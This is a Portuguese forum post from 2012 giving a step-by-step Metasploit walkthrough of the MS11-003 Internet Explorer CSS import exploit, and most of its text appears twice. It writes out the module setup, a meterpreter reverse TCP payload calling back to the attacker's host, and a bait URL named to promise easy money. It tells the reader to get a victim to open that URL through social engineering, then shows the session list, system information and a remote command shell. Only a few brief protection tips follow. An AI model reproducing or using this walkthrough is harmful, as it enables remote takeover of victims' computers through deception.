Tweet
Olá.
Foi encontrada no famoso IEca (sim, aquele navegador que deixou de ser o mais usado do mundo) há 1 ano e 21 dias (considerando que hoje é 29/02/12), no motor HTML (Microsoft HTML Engine/mshtml), uma vulnerabilidade que permite a execução de comandos a nível do usuário local (o que significa, na maioria dos computadores com Windows, o próprio administrador).
Segundo o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., a execução remota de comandos ocorre "se um usuário exibir uma página da Web especialmente criada" utilizando o navegadorzinho deles.
O Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... diz que o módulo explora uma vulnerabilidade que corrompe a memória do HTML Engine. Ao analisar uma página HTML que contém uma importação CSS recursiva, um objeto em C++ é excluído e reutilizado. Em outras palavras, isto quer dizer a possibilidade da execução de código arbitrário. Já que, para bypassear Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (recurso de segurança da Microsoft que impede a execução de códigos de uma região da memória não-executável em um aplicativo) e Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (método que dispõe randomicamente as posições das chaves áreas de dados), ele precisa de recursos do dotNET (>=2, por ter 'mscorie.dll'), é necessário que o alvo possua esta ferramenta instalado.
O exploit: ms11_003_ie_css_import. Vamos ver como utilizá-lo:
Abra o Metasploit Framework (eu sou fã do console, mas se você preferir interface gráfica ou web...). Vamos setar o exploit que utilizaremos:
Caso você não possua este módulo, rode "msfupdate" e tente usá-lo novamente.
Agora vamos setar o payload utilizado. Pretendemos uma conexão reversa em TCP.
Vamos dar uma olhada em suas opções (variáveis), digitando "set" e enter.
Vamos setar algumas variáveis que nos interessam:
IP do servidor deverá ser Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Agora vamos setar a porta que utilizaremos e o nome do "arquivo" que será acessado. Por padrão, os navegadores acessam a porta 80. Você pode utilizá-la se quiser, mas eu optei pela porta 81 pois na porta 80 rodava o Apache e eu não queria desligá-lo (tudo bem, fiquei com preguiça de rodar um '/etc/init.d/apache2 stop').
Vamos agora setar o IP e a porta para os quais a conexão reversa, após o exploit trabalhar, será direcionada. Pode ser o mesmo seu endereço IP.
Tudo pronto? Vamos rodar o comando "exploit":
Ele dará alguns detalhes, mas dará também isso:
Aí está a URL "mágica". Envie-a para o alvo e, utilizando engenharia social, faça-o acessá-la.
Quando ele acessar, aparecerá em sua janela:
Ele dará alguns detalhes sobre a "conversa" TCP e, no final, dará algo semelhante a isso:
Isto significa que ele gerou um processo chamado notepad.exe na máquina do usuário.
Vamos verificar as sessões para termos certeza de que podemos continuar.
Aparecerá a lista de sessões. Verifique se o alvo esta lá. Se estiver, ótimo! Pegue a ID do mesmo na primeira coluna (vamos supor que esta é 1), e vamos interagir com ele:
Enfim, ele nos entrega o seguinte:
Vamos obter algumas informações sobre o sistema, como o nome do computador, o sistema operacional, o idioma e a arquitetura:
Tudo certo até aqui? Vamos continuar e partir para a melhor parte: obter acesso ao CMD. Agora é simples, veja:
Digitamos o comando "shell", ele mostra alguns detalhes, e...
Simples, não é mesmo?
Agora eu te pergunto: onde está o seu amor? (Não entendeu? Clique Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
Como se proteger? Bem, mantenha seu sistema sempre seguro. Impossível? Pior que sim...
Mas algumas dicas básicas podem evitar que você não seja uma vítima:
1. Mantenha sempre antivírus e firewall atualizados
2. Atualize sempre seu sistema operacional e navegador
3. Não abra links desconhecidos. Vale, às vezes, abrir o link com um 'view-source:' na frente, só para analisar um pouco.
4. Considere trocar para Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
.
Att, 0KaL.
P. S.: Coincidência; o Jornal da Globo está falando sobre privacidade na internet.
Foi encontrada no famoso IEca (sim, aquele navegador que deixou de ser o mais usado do mundo) há 1 ano e 21 dias (considerando que hoje é 29/02/12), no motor HTML (Microsoft HTML Engine/mshtml), uma vulnerabilidade que permite a execução de comandos a nível do usuário local (o que significa, na maioria dos computadores com Windows, o próprio administrador).
Segundo o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., a execução remota de comandos ocorre "se um usuário exibir uma página da Web especialmente criada" utilizando o navegadorzinho deles.
O Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... diz que o módulo explora uma vulnerabilidade que corrompe a memória do HTML Engine. Ao analisar uma página HTML que contém uma importação CSS recursiva, um objeto em C++ é excluído e reutilizado. Em outras palavras, isto quer dizer a possibilidade da execução de código arbitrário. Já que, para bypassear Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (recurso de segurança da Microsoft que impede a execução de códigos de uma região da memória não-executável em um aplicativo) e Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (método que dispõe randomicamente as posições das chaves áreas de dados), ele precisa de recursos do dotNET (>=2, por ter 'mscorie.dll'), é necessário que o alvo possua esta ferramenta instalado.
O exploit: ms11_003_ie_css_import. Vamos ver como utilizá-lo:
Abra o Metasploit Framework (eu sou fã do console, mas se você preferir interface gráfica ou web...). Vamos setar o exploit que utilizaremos:
Código:
msf > use exploit/windows/browser/ms11_003_ie_css_import
Agora vamos setar o payload utilizado. Pretendemos uma conexão reversa em TCP.
Código:
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
Código:
msf exploit(ms11_003_ie_css_import) > set Module: windows/browser/ms11_003_ie_css_import ============================================== Name Value ---- ----- DisablePayloadHandler false EXITFUNC process EnableContextEncoding false HTML::base64 none HTML::javascript::escape 0 HTML::unicode none HTTP::chunked false HTTP::compression none HTTP::header_folding false HTTP::junk_headers false HTTP::server_name Apache InitialAutoRunScript migrate -f OBFUSCATE true SRVHOST 0.0.0.0 SRVPORT 8080 SSL false SSLVersion SSL3 TCP::max_send_size 0 TCP::send_delay 0 VERBOSE false payload windows/meterpreter/reverse_tcp
IP do servidor deverá ser Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
Código:
msf exploit(ms11_003_ie_css_import) > set svrhost seu.ip.aq.ui
Código:
msf exploit(ms11_003_ie_css_import) > set svrport 81 msf exploit(ms11_003_ie_css_import) > set uripath ganhedinheiro.htm
Código:
msf exploit(ms11_003_ie_css_import) > set lhost meu.ip.aqu.i msf exploit(ms11_003_ie_css_import) > set lport 82
Código:
msf exploit(ms11_003_ie_css_import) > exploit
Código:
[*] Using URL: http://meu.ip.a.qui/ganhedinheiro.htm
Quando ele acessar, aparecerá em sua janela:
Código:
[*] ip.da.vit.ima:porta Received request for "/ganhedinheiro.html"
Código:
[*] New server process: notepad.exe
Vamos verificar as sessões para termos certeza de que podemos continuar.
Código:
msf exploit(ms11_003_ie_css_import) > sessions -l
Código:
msf exploit(ms11_003_ie_css_import) > sessions -i 1[*] Starting interaction with 1...
Código:
meterpreter >
Código:
meterpreter > sysinfo
Código:
meterpreter > shell
Código:
Microsoft Windows [Version X] Copyright (c) 2009 Microsoft Corporation. All rights reverved. C:\Users\unavailable\Desktop>_
Agora eu te pergunto: onde está o seu amor? (Não entendeu? Clique Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
Como se proteger? Bem, mantenha seu sistema sempre seguro. Impossível? Pior que sim...
Mas algumas dicas básicas podem evitar que você não seja uma vítima:
1. Mantenha sempre antivírus e firewall atualizados
2. Atualize sempre seu sistema operacional e navegador
3. Não abra links desconhecidos. Vale, às vezes, abrir o link com um 'view-source:' na frente, só para analisar um pouco.
4. Considere trocar para Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
.Att, 0KaL.
P. S.: Coincidência; o Jornal da Globo está falando sobre privacidade na internet.
